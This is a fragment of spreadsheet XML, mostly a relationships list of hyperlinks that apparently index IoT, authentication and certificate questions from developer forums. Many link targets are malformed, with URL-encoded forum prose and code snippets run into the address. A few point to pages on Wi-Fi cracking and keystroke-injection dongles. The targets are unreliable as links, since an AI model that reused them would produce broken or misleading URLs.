    <xf borderId="0" fillId="2" fontId="7"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cs.internetofthings.ibmcloud.com/swagger/v0002.html" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.w3.org/TR/WebCryptoAPI/" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.0.5/mypage?secret=1234,%20this%20happens:%0A%0AProcessing%20the%20HTTP%20request%0AThe%20implementation%20of%20the%20web%20server%20is%20quite%20simple." TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://firebase.google.com/docs/database/rest/auth" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Aadhaar" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/thisbejim/Pyrebase%0ACode%20that%20works%20for%20me:%0Aimport%20pyrebase%0Aconfig%20=%20%7b%0A%20%20%20%20'apiKey':%20%22YYY%22,%0A%20%20%20%20'authDomain':%20%22XXXXXXXX.firebaseapp.com%22,%0A%20%20%20%20'databaseURL':%20%22https://XXXXXXXX.firebaseio.com%22,%0A%20%20%20%20'projectId':%20%22XXXXXXXX%22,%0A%20%20%20%20'storageBucket':%20%22XXXXXXXX.appspot.com%22,%0A%20%20%20%20'messagingSenderId':%20%22ZZZ%22,%0A%7d%0Afirebase%20=%20pyrebase.initialize_app(config)%0A%0AuserEmail%20=%20'youremailadresthatyouaddedtofirebasedatabaseauthenticatedusers'%0AuserPass%20=%20'yourpasswordsetupforthisemail'%0A%0Aauth%20=%20firebase.auth()%0A%0A#%20Log%20the%20user%20in%0Auser%20=%20auth.sign_in_with_email_and_password(userEmail,%20userPass)%0A%0A#%20Get%20a%20reference%20to%20the%20database%20service%0Adb%20=%20firebase.database()%0A%0A#%20data%20to%20save%0Adata%20=%20%7b%0A%20%20%20%20%20%20%20%20%20%20%20%20%22name%22:%20%22Mortimer%20'Morty'%20Smith%22%0A%20%20%20%20%20%20%20%20%20%20%20%20%7d%0A%0A#%20Pass%20the%20user's%20idToken%20to%20the%20push%20method%0Aresults%20=%20db.child(%22test%22).push(data,%20user%5b'idToken'%5d)%0Aprint%20results%0Aresults%20=%20db.child(%22test%22).get(user%5b'idToken'%5d)%0Aprint%20results.val()" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pub.dartlang.org/packages/shelf%0Ahttps://pub.dartlang.org/packages/shelf_auth%0Ahttps://pub.dartlang.org/packages/shelf_bind%0Ahttps://pub.dartlang.org/packages/shelf_exception_response%0Ahttps://pub.dartlang.org/packages/shelf_injection_router%0Ahttps://pub.dartlang.org/packages/shelf_path%0Ahttps://pub.dartlang.org/packages/shelf_route%0Ahttps://pub.dartlang.org/packages/shelf_rest%0Ahttps://pub.dartlang.org/packages/shelf_static%0Ahttps://pub.dartlang.org/packages/shelf_web_socket%0Ahttps://pub.dartlang.org/packages/http_multi_server%0Ahttps://pub.dartlang.org/packages/shelf_html%20(for%20the%20client%20side)%0Ahttp://thomaslockerambling.blogspot.co.at/2014/09/dart-shelf-and-unit-testing.html" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.arduino.cc/en/Reference/UnsignedInt%0A%0AOn%20the%20Uno%20and%20other%20ATMEGA%20based%20boards,%20unsigned%20ints%20(unsigned%0A%20%20integers)%20are%20the%20same%20as%20ints%20in%20that%20they%20store%20a%202%20byte%20value." TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://user:pass@host/)%20are%20blocked." TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ngrok.com/docs" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.aws.amazon.com/iot/latest/apireference/API_CreateCertificateFromCsr.html" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/knolleary/pubsubclient/tree/master/examples/mqtt_esp8266%0AMy%20device%20is%20registered%20with%20the%20IBM%20Bluemix%20IoT%20Foundation%20(IoTF)." TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.oracle.com/javase/7/docs/api/java/security/SecureRandom.html" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://social.msdn.microsoft.com/Forums/en-US/19183e82-437e-4d6f-8498-ed33ba18a3fa/creating-iot-device-with-azure-dps-via-rest?forum=azureiothub%0ANow%20If%20I%20trust%20on%20above%20link%20(However%20I%20do%20not%20think%20it%20will%20work%20)%20then%20where%20is%20the%20use%20of%20certificate%20.PFX%20file%20?" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-ca/azure/iot-edge/how-to-auto-provision-simulated-device-windows%0Aany%20idea%20how%20to%20do%20provision%20a%20device%20with%20x509%20certificate?" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityworldmag.com/data_file/product/HID%20CARD.jpg" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.espressif.com/sites/default/files/documentation/5a-esp8266_sdk_ssl_user_manual_en.pdf%0AAlso,%20try%20TLS%201.1%20to%20see%20what%20it%20does." TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://192.168.56.235:9446/carbon%20url%20is%20intentionally%20blocked%20in%20the%20IoTS%203.0.0,%20This%20port%20belongs%20to%20mqtt%20broker%20and%20there%20is%20no%20UI%20capability%20for%20this." TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.internetofthings.ibmcloud.com/swagger/v0002.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dwyl/learn-aws-iot/blob/master/src/js/utils/request.js" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OhadR/oAuth2-sample/tree/master/authentication-flows%0Aclient%20application:%20%0Ahttps://github.com/OhadR/Authentication-Flows%0ADemo:%20http://auth-flows-demo.appspot.com/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/awslabs/aws-sdk-ios-samples/tree/master/IoT-Sample/Swift/IoTSampleSwift%0AIn%20the%20sample%20project%20above,%20application%20generates%20its%20own%20certificate%20and%20key%20pair%20using%20AWSIoT%20SDK." TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.thethingsnetwork.org/forum/t/limitations-data-rate-packet-size-30-seconds-uplink-and-10-messages-downlink-per-day-fair-access-policy/1300%0AYou%20definitively%20cannot%20have%20more%20than%20255%20bytes%20in%20a%20message%20including%20header%20bytes." TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://azure.microsoft.com/en-in/services/iot-hub/%0AFrom%20the%20documentation:%0AConnect,%20monitor%20and%20manage%20billions%20of%20IoT%20assetsUse%20Azure%20IoT%20Hub%20to%20securely%20connect,%20monitor%20and%20manage%20billions%20of%20devices%20to%20develop%20Internet%20of%20Things%20(IoT)%20applications." TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://username:password@members.dyndns.org/nic/update?hostname=yourhostname&amp;myip=ipaddress&amp;wildcard=NOCHG&amp;mx=NOCHG&amp;backmx=NOCHG%0ARaw%20HTTP%20GET%20Request%0AActual%20HTTP%20request%20should%20look%20like%20following%20fragment." TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://176.32.230.47/noticeboard.com/php/index.php%0Acustomer%20enters%20login,%20password,%20it%20all%20looks%20ok%0Ahttp://176.32.230.47/%20generates%20a%20session%20cookie,%20and%20redirects%20to%20http://192.168.0.5?secret=abcdefgh%0Ahttp://192.168.0.5%20gets%20a%20HTTP%20request,%20and%20extracts%20the%20secret%0Ahttp://192.168.0.5%20validates%20the%20secret%20by%20calling%20a%20new%20service%20http://176.32.230.47/validate?secret=abcdefgh%0Aif%20the%20validation%20returns%20ok,%20192.168.0.5%20returns%20the%20page." TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hivemq.com/blog/mqtt-essentials-part-5-mqtt-topics-best-practices/%20%0A%0ATalking%20about%20your%20specific%20case%0A%0A%0AEach%20device%20needs%20to%20have%20a%20unique%20identity%20to%20send%20a%20command%20to%20a%20particular%20device." TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Phishing%0Ahttps://www.securelist.com/en/threats/spam?chapter=85" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blogs.msdn.com/b/wsdevsol/archive/2015/03/26/how-to-use-a-shared-user-certificate-for-https-authentication-in-an-enterprise-application.aspx%0AExcerpt%20from%20the%20article:%0AHowever,%20the%20security%20subsystem%20requires%20user%20confirmation%20before%20allowing%20access%20to%20a%20certificates%20private%20key%20of%20a%20certificate%20stored%20in%20the%20shared%20user%20certificates%20store." TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Directive_on_Privacy_and_Electronic_Communications" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Transport_Layer_Security" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing1.xml"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/google/sanitizers/wiki/AddressSanitizer" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unix.stackexchange.com/questions/427345/keyboard-monitoring-without-display%0AI%20modified%20his%20solution%20a%20bit%20so%20that%20I%20can%20exit%20from%20listening%20when%20escape%20key%20is%20pressed." TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.wso2.com/display/IoTS300/Changing+the+Super+Administrator+Password%20:%20Changing%20the%20password%20via%20file%20configurations." TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/adafruit/Adafruit-Fingerprint-Sensor-Library%0AHowever,%20it%20seems%20that%20currently%20all%20of%20the%20fingerprint%20image/feature%20was%20store%20on%20the%20chip%20inside%20the%20fingerprint%20scanner." TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.raspberrypi.org/documentation/installation/sd-cards.md%0A%0AIf%20you%20are%20having%20trouble%20with%20corruption%20of%20your%20SD%20cards,%20make%20sure%20you%20follow%20these%20steps:%0A%0AMake%20sure%20you%20are%20using%20a%20genuine%20SD%20card." TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/system.security.permissions.securityaction.aspx" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://firebase.google.com/docs/auth/android/anonymous-auth." TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/xamarin/Xamarin.Auth" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Encrypting_File_System" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/azure/container-registry/container-registry-authentication%0AIoT%20Edge%20:%20device%20can't%20download%20my%20module%20from%20Azure%20Container%20Registry%20but%20it%20can%20from%20dockerhub%0ACould%20you%20help%20to%20solve%20this%20problem?" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.raspberrypi.org/forums/view%20...%20hp?t=62371%0ANow%20the%20second%20issue%20i%20faced%20is%20WPA2%20authentication." TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ms-iot/security/issues/29" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/username/reponame.git%0Athen%20you%20can%20convert%20it%20to%20the%20ssh%20style%20address:%0Assh://git@github.com/username/reponame.git%20%20%20(mind%20that%20you%20only%20have%20to%20change%20username%20and%20reponame%20parts." TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Azure/dps-keygen/tree/master/bin/windows%0AProvide%20the%20correct%20data%20ScopeID,%20DeviceID%20and%20Primary%20key,%20get%20the%20connection%20string%20and%20use%20your%20already%20existing%20Azure%20IoT%20hub%20API." TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://fabriccontroller.net/iot-with-azure-service-bus-event-hubs-authenticating-and-sending-from-any-type-of-device-net-and-js-samples/" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dl.espressif.com/dl/package_esp32_index.json%0ANote:%20If%20you%20have%20existing%20URLs%20don't%20delete%20them%20otherwise%20you%20will%20lose%20access." TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.android.com/things/preview/releases.html%0AAnother%20way%20to%20force%20permissions%20to%20be%20given,%20is%20to%20start%20your%20app%20with%20%20and%20the%20-g%20flag%20(this%20will%20be%20default%20in%20a%20future%20version%20of%20AndroidStudio)" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://minwinpc:8080/api/resourcemanager/processes%0A(you%20maybe%20prompted%20to%20login%20-%20I%20wasnt)%0AThis%20what%20I%20see%20from%20my%20machine." TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.microsoft.com/windows/windowsmedia/howto/articles/introencoding.aspx" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digitalocean.com/community/tutorials/how-to-configure-ssh-key-based-authentication-on-a-linux-server%0Ahttps://www.garron.me/en/go2linux/ssh-sudo-run-commands-remote-server.html" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://myraspberryandme.wordpress.com/2013/11/20/bluetooth-serial-communication-with-hc-05/%0ABasically,%20you%20need%20to%20provide%20the%20password%20(1234)%20of%20the%20HC-05%20module%20before%20connecting." TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://forum.gitlab.com/t/cannot-clone-via-https-with-error-server-certificate-verification-failed/4782%20doesn't%20seem%20to%20apply%20as%20it%20is%20talking%20about%20the%20server%20side?" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://secure.logmein.com/labs/" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackster.io/krvarma/rpivoice-051857%0A%0APerhaps%20there%20is%20in%20future%20driver%20updates%20in%20Windows%20Updates%20and%20we%20no%20longer%20have%20such%20problems." TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.imada.sdu.dk/Courses/DM18/Litteratur/IntelnATT.htm%20More%20about%20Intel%20vs.%20AT&amp;T%20syntax." TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.salesforce.com/docs/atlas.en-us.mobile_sdk.meta/mobile_sdk/intro.htm" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://azure.microsoft.com/en-us/blog/announcing-the-public-preview-of-windows-container-support-in-azure-app-service/%0AAppService%20can't%20open%20against%20the%20Intermediate%20Store%20to%20install%20a%20Certificate%20chain." TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SimpleAuthentication/SimpleAuthentication%0A--%0ASimpleAuthentication%20is%20a%20ASP.NET%20library%20that%20makes%20it%20really%20simple%20to%20for%20developers%20to%20add%20Social%20Authentication%20code%20to%20an%20ASP.NET%20application." TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://localhost:9443/devicemgt/uuf/login?referer=/%20%0A---------------------%20Update%20--------------------%20%0AFYI:%20carbon%20works%20like%20a%20charm%20%0Ahttps://localhost:9443/carbon/admin/login.jsp" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ZAP%0AThe%20Zed%20Attack%20Proxy%20(ZAP)%20is%20an%20easy%20to%20use%20integrated%20penetration%20testing%20tool%20for%20finding%20vulnerabilities%20in%20web%20applications." TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/myProject/Myloginform.aspx?ReturnUrl=%2fmyProject%2findex.aspx%0AAfter%20successful%20authentication,%20user%20is%20redirected%20to%20ReturnUrl:%0Ahttp://localhost/myProject/findex.aspx" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://arduino.cc/en/Tutorial/SecretsOfArduinoPWM%0Aedit:%20i've%20missed%20you%20are%20using%20ICR1%20as%20TOP%20and%20OCR1A%20as%20counter." TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.circuitbasics.com/raspberry-pi-zero-ethernet-gadget/%20%0AThe%20result%20of%20this%20is%20a%20full%20network%20interface%20that%20you%20can%20not%20only%20use%20to%20transfer%20data%20over%20a%20TCP/IP%20socket%20but%20at%20the%20same%20time%20run%20a%20SSH-connection%20to%20start%20and%20monitor%20your%20application." TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.oracle.com/javase/7/docs/api/java/util/StringTokenizer.html%0AI%20am%20checking%20the%20library%20Adafruit_NeoMatrix%20but%20I%20can't%20find%20all%20the%20functions%20available." TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pygodaddy.readthedocs.org/en/latest/%0AFeatures%0A%0ALogin%20with%20a%20USERNAME%20and%20a%20PASSWORD%0ACREATE,%20READ,%20UPDATE,%20DELETE%20your%20domain's%20DNS%20Records%20(A-Record%20only%20for%20now)%0A%0AVisit%20the%20project%20page%20on%20GitHub." TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://serverfault.com/questions/94503/login-without-running-bash-profile-or-bashrc" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kreait/firebase-php%20is%20a%20library%20that%20provides%20service%20account%20based%20authentication,%20your%20code%20would%20look%20something%20like%20this:%0A%0ADisclaimer:%20I'm%20the%20creator%20of%20that%20library%20:)" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sso.toutiao.com/login/?next=/&amp;service=https://mp.toutiao.com/sso_confirm/?redirect_url=/%0AI%20am%20trying%20to%20reach%20the%20website%20above%20and%20%20automaticlly%20fill%20username%20using%20selenium%20and%20python." TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/system.web.security.sqlmembershipprovider(v=vs.110).aspx" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/phpinfo.php%0ARemember%20to%20delete%20it%20afterwards%20for%20security%20reasons." TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.docker.com/products/docker-trusted-registry" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blogs.msdn.com/b/shawnfa/archive/2006/10/09/the-differences-between-rijndael-and-aes.aspx%20explains%20the%20difference%20between%20the%20AES%20standard,%20.NET%20implementation%20and%20the%20original%20Rijndael%20cipher." TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Safari_(web_browser)" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.microsoft.com/PlayReady/%0AThe%20Netflix%20Silverlight%20application%20is%20a%20very%20common%20example%20of%20PlayReady%20protected%20video%20content." TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/azure/app-service/overview-compare%0AYou%20are%20exactly%20correct%20on%20the%20DPS%20code%20requires%20a%20local%20cert%20store." TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.windows.com/en-us/develop/app-certification-kit" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/E_(verification_language)%0AThe%20e%20language%20uses%20an%20Aspect-Oriented%20Programming%20(AOP)%20approach,%20which%20is%20an%20extension%20of%20the%20object-oriented%20programming%20approach%20to%20specifically%20address%20the%20needs%20required%20in%20functional%20verification." TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://lewiscomputerhowto.blogspot.ca/2014/06/how-to-hack-wpawpa2-wi-fi-with-kali.html?m=1%0AIt%20also%20gives%20tips%20on%20the%20process%20of%20pen%20testing." TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/open?id=0B9zzhouEyyN_RmttYVVOZXE0d2JXNWtTZHBjTlZYRTZkdy1N%0AFrom%20what%20I%20can%20read%20it%20has%20to%20do%20with%20an%20authority%20problem%20from%20where%20the%20program%20is%20being%20run." TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://youtu.be/F9yMTdcd33w?t=240%0AHowever,%20the%20Android%20application%20does%20not%20come%20back%20with%20the%20information%20of%20a%20device%20once%20it%20is%20already%20connected." TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/rest/api/iot-dps/runtimeregistration/registerdevice%0AI%20have%20not%20understand%20how%20to%20pass%20the%20body%20information%20like%20structure%20of%20JSON.I%20know%20I%20have%20to%20use%20x509%20as%20Attestation%20type%20but%20how%20I%20will%20form%20is%20it%20like%20%0A%0AOr%20if%20its%20a%20json%20then%20what%20will%20be%20the%20name%20of%20attribute%20?" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nodemcu.readthedocs.io/en/master/en/modules/net/" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://source.sierrawireless.com/resources/airprime/minicard/2130617_ac_ap_umts_supported_at_command_reference/%0AFree%20signup%20on%20sierrawireless%20if%20you%20don't%20have%20login." TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://a1pn10j0v8htvw.iot.us-east-1.amazonaws.com:8443/topics/iotbutton/virtualButton?qos=1)%0AAuthorisation%20Type:%20AWS%20Signature%0AAccessKey%20/%20SecretKey:%20As%20per%20your%20credentials%0AAWS%20Region:%20Region%20you%20AWS%20IoT%20instances%20is%20in%0AService%20Name:%20iotdata%0ASession%20Token:%20Leave%20blank" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/storage/docs/access-control/signed-urls" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aws.amazon.com/blogs/iot/setting-up-just-in-time-provisioning-with-aws-iot-core/%0AIf%20I%20use%20the%20default%20policy%20provided%20in%20this%20link,%20I%20am%20able%20to%20successfully%20register%20the%20thing." TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.android.com/about/versions/marshmallow/android-6.0-changes.html%0AAlso%20android.permission.BLUETOOTH_ADMIN,%20android.permission.BLUETOOTH%0AI%20have%20checked,%20ACCESS_FINE_LOCATION%20or%20ACCESS_COARSE_LOCATION%20over%20Android%20%3e=6.0%20needs%20runtime%20permission%20but%20it%20give%20an%20error%20due%20Android%20Things%20limitation." TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jeffboody/spp-mirror%0AIf%20invoking%20avrdude%20with%20%22exec%22%20does%20not%20give%20network%20permissions%20you%20may%20need%20to%20build%20avrdude%20as%20a%20library%20so%20that%20it%20has%20the%20same%20permissions%20as%20your%20app." TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.codehelp.co.uk/html/code10.html%0Anotice%20if%20you%20go%20to%20-%3e%20sketch%20it%20has%20an%20option%20for%20verify/compile%0Asending%20commands%20from%20a%20language%20like%20ruby%20or%20any%20other%20for%20that%20matter%20are%20possible%20through%20UART%20-%20http://en.wikipedia.org/wiki/Universal_asynchronous_receiver/transmitter%0Aor%20%20any%20other%20communication%20protocol%20either%20over%20a%20physical%20ethernet/%20usb%20cable%20or%20wirelessly%20through%20bluetooth,%20wifi,%20etc." TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://spring.io/guides/gs/securing-web/%0AI%20can%20run%20the%20project%20by%20running%20it%20as%20an%20application." TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/RadiusNetworks/android-ibeacon-service%0AUse%20this%20to%20detect%20iBeacons." TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://elinux.org/RPi_VerifiedPeripherals%0AThis%20is%20a%20list%20of%20all%20verified%20devices%20for%20the%20pi%20I%20found." TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.adafruit.com/products/751%0AI%20am%20trying%20to%20implement%20a%20patient%20identification%20system%20using%20the%20adafruit%20fingerprint%20sensor%20with%20arduin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63"/>
    <col customWidth="1" min="3" max="3" width="92.5"/>
    <col customWidth="1" min="4" max="4" width="10.63"/>
    <col customWidth="1" min="5" max="5" width="26.25"/>
    <col customWidth="1" min="6" max="6" width="30.63"/>
  </cols>
